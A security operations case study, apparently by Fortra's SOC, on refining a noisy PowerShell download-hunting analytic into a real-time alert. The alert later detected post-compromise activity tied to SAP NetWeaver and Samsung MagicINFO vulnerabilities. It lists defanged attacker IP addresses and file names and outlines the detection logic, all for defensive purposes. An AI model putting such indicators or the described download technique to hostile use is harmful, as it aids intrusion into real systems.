Case Study: Evolving a Threat Hunting Analytic to Detect Post-Compromise Activity Across Customers

Executive Summary 

In this case study, we explore how a threat hunting analytic evolved from a noisy, broad detection rule into a precise, real-time alert, enabling the detection of post-compromise activity across different customer environments. 

Following a post-compromise incident involving Customer A, the Fortra SOC identified surrounding suspicious PowerShell-based behaviour on a threat hunting dashboard, in a daily-reviewed analytic. While the original analytic was too noisy for real-time alerting, it led to a refinement of the logic into a high-fidelity analytic with actionable value. 

A few months later, that refined analytic successfully triggered an alert in Customer B, uncovering post-compromise activity achieved through exploiting a different CVE, but exhibiting a similar technique: PowerShell-based file downloads. 

This outcome demonstrates the value of iterative analytic tuning and behavioural threat hunting in identifying repeatable attacker tradecraft across environments, even when threats differ in origin, tooling or initial entry vectors. 

Initial Detection: Incident in Customer A  

In April 2025, the Fortra SOC alerted Customer A to a Kerberoasting attack happening in their environment. Kerberoasting is a post-compromise Active Directory (AD) attack which targets the Kerberos authentication protocol with the intention of stealing AD credentials. Due to the naming of the affected user account the SOC observed and no surrounding indicators of an entry vector, an early hypothesis was made that this attack may have revolved around a remote code execution (RCE) vulnerability in SAP NetWeaver and the SOC were able to inform the customer of this hypothesis and point them in that direction.  

As part of standard post-compromise investigation procedures, the SOC team began reviewing behavioural and contextual telemetry for additional indicators of compromise. 

During this process, the team turned to the daily-reviewed threat hunting analytics, which are detections that surface behaviours of interest without generating real-time alerts, due to their broader scope or higher false positive rates. One particular analytic, designed to detect PowerShell initiating outbound connections to IP addresses, stood out. Though previously considered too noisy for production alerting, it had uncovered unseen PowerShell-based download activity associated with the attacker’s post-compromise actions. 

The file hash for “rs64c[.]exe” at the time had previously been linked to Black Basta ransomware, and the IP address “162[.]220[.]61[.]172” had a reputation as a cracked Cobalt Strike Command & Control (C2) server. The Fortra SOC notified the customer of this activity immediately with recommendations. Around three weeks later, SAP disclosed CVE-2025-31324, which is a critical vulnerability in SAP NetWeaver Visual Composer, allowing unauthenticated threat actors to upload malicious files. Following this disclosure came public articles on this CVE being exploited, with matching IOCs as to what was observed here, and ties to multiple ransomware groups. 
 
It was ultimately determined that the post-compromise activity observed by the Fortra SOC was the result of SAP NetWeaver vulnerability, CVE-2025-31324. This immediately put this vulnerability on Fortra’s radar and an Emerging Threat was called. This included developing and releasing numerous detections such as vulnerability scan coverage, IDS signatures and log telemetry to help detect exploitation of this vulnerability across the customer base.  
 
 

Analytic Review and Refinement  

While reviewing the threat hunting analytic, it became clear that the underlying behaviour – PowerShell being used to download files from external infrastructure – was a valuable indicator of post-compromise activity, but the existing detection was too broad. It frequently matched legitimate administrative or automation tasks. 

Refinement Objectives: 

• Reduce noise from benign PowerShell usage 

• Retain visibility into attacker tradecraft 

• Make the logic reliable enough for real-time alerting 

Refinements Implemented: 

• Added checks for presence of URI components, not just raw IP addresses, to focus on file downloads 

• Tuned logic to ignore known-good usage patterns, reducing false positives from internal scripts etc 

These changes resulted in a new high-fidelity analytic, which was then promoted to generate real-time alerts for the Fortra SOC to review. 

Detection in Customer B 

Several months later, the newly created alert fired – not in Customer A, but in Customer B. The Fortra SOC was alerted to PowerShell activity matching the refined pattern; a suspicious download from an external IP, where a URI was present. 
 

Immediately this looked suspicious to the SOC as a PHP file was being downloaded and its contents were being written to a PowerShell script file named “win[.]ps1” on the customer’s host. A subsequent reputation check on “157[.]230[.]106[.]100” linked this IP address to malicious activity. With further investigation into this activity, the Fortra SOC was able to tie this attack to the Samsung MagicINFO 9 Server vulnerability (CVE-2025-4632) and inform the customer of this with the appropriate recommendation steps. The now automated detection alerted the SOC to true positive post-compromise activity happening in real-time, allowing for a quick response and an escalation to the customer. 

Fortra was then able to build specific detections for exploitation of this CVE, and was able to perform a proactive review of our data to see whether there were any indicators of other customers using Samsung MagicINFO, allowing us to reach out to those customers to make them aware of the CVE and ensure they were patched against it.  
 

Key Differences from the Original Incident: 

• Different threat actor and infrastructure 

• Different initial entry vector - CVE-2025-4632 exploited 

Despite these differences, the post-compromise behaviour shared a similarity; PowerShell used to download additional tooling from a remote host. 

Due to the improved fidelity of the analytic, the alert was immediately actionable, and investigation confirmed malicious activity early in the attack lifecycle, and the SOC was able to tie this to the exploitation of CVE-2025-4632 from published IOCs.  

Outcomes and Impact 

This analytic evolution directly enabled the early detection of a new, unrelated threat. Although Customer B’s incident differed entirely in its root cause and threat actor, the shared behavioural technique of the PowerShell-based downloads served as a reliable detection point. 

Key Benefits: 

• Faster detection: The refined analytic triggered as soon as the behaviour occurred, reducing the time to triage and respond. 

• Cross-customer learning: Insights from Customer A’s incident enabled proactive defences for other customers. 

• Repeatable tradecraft detection: Entry vector was not initially detected, but a common post-compromise technique was used – now detectable in real-time. 

Impact: 

• False positives reduced 

• Time to detect: Reduced from hours to minutes 

• Detection coverage expanded: Analytic now deployed across all environments 

   

Lessons Learned 

This case illustrates the power of behavioural detection, even when technical indicators (IP addresses, domains, CVEs) differ. 

What This Demonstrates: 

• Threat actors repeat tactics: Different campaigns can reuse similar post-compromise actions 

• Noise can be valuable: Analytics that seem noisy can surface highly effective detections – with tuning. 

• Cross-customer value: Lessons from one environment can be directly translated into improved security outcomes for other customers. 

Conclusion 

By investigating post-compromise activity in Customer A, and using threat hunting analytics to surface patterns of interest, the SOC was able to refine a noisy detection into a high-confidence analytic. That same analytic went on to detect similar activity in Customer B, despite different threat actors and attack vectors. 

This case reinforces the importance of behavioural threat hunting, cross-environment learning, and continuous refinement of detection logic to stay ahead of evolving threats.